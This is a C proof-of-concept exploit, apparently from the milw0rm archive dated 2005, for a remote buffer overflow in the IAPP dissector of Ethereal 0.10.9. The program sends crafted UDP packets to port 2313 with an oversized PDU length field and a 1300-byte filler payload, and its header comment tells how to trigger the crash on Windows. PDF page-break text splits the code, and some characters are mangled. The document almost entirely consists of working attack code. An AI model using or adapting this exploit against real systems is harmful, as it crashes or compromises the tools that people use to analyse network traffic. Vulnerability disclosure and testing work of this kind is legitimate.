1 /*
2 *
3 * Ethereal IAPP remote buffer overflow #2 PoC exploit
4 * −−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−−
5 * To test this vulnerability on windows, try to send 3−10 packets
6 * that will trigger the crash, and scroll between captured packets
7 * in Ethereal.
8 *
9 * Coded by Leon Juranic <ljuranic@lss.hr>
10 * LSS Security <http://security.lss.hr/en/>
11 *
12 */
13
14 #include <stdio.h>
15 #include <windows.h>
16
17 #pragma comment (lib,"ws2_32")
18
19 #define IAPP_PDU_SSID 0
20
21 typedef struct _e_iapphdr {
22 unsigned char ia_version;
23 unsigned char ia_type;
24 } e_iapphdr;
25
26
27 typedef struct _e_pduhdr {
28
unsigned char pdu_type;
29
unsigned char pdu_len_h;
30
unsigned char pdu_len_l;
31 } e_pduhdr;
32
33
34 void xp_sendpacket (char *pack)
35 {
36
WORD wVersionRequested;
37
WSADATA wsaData;
38
int err;
39
int sock,i;
40
struct sockaddr_in sin;
41
unsigned char buf[2000];
42
char bla[2000];
43
e_iapphdr *iapp;
44
e_pduhdr *pdu;
45
46
wVersionRequested = MAKEWORD( 2, 2 );
47
err = WSAStartup( wVersionRequested, &wsaData );
48
if ( err != 0 ) {
49
printf ("error!!!\n");
50
ExitProcess(−1);
51
}
52
Page 1/2
Ethereal 0.10.9 3GA11 Remote Buffer Overflow Exploit 2
Leon Juranic
03/12/2005
53
sock=socket(AF_INET,SOCK_DGRAM,0);
54
55
sin.sin_family=AF_INET;
56
sin.sin_addr.s_addr = inet_addr(pack);
57
sin.sin_port = htons(2313);
58
59
iapp = (e_iapphdr*)&buf;
60
iapp−>ia_version = 1;
61
iapp−>ia_type = 1;
62
63
pdu = (e_pduhdr*)(buf+2);
64
pdu−>pdu_type = 3;
65
pdu−>pdu_len_h = 0x05;
66
pdu−>pdu_len_l = 0xa1;
67
68
memset (bla,’\xfc’,1300);
69
strncpy ((char*)&buf+sizeof(e_iapphdr)+sizeof(e_pduhdr),bla,2000);
70
71 //
for (i=0;i<1000;i++)
72
sendto (sock,(char*)buf,1489,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
73
74 }
75
76
77 main (int argc, char **argv)
78 {
79
80
xp_sendpacket(argv[1]);
81 }
82
83 // milw0rm.com [2005−03−12]
Page 2/2
Ethereal 0.10.9 3GA11 Remote Buffer Overflow Exploit 2
Leon Juranic
03/12/2005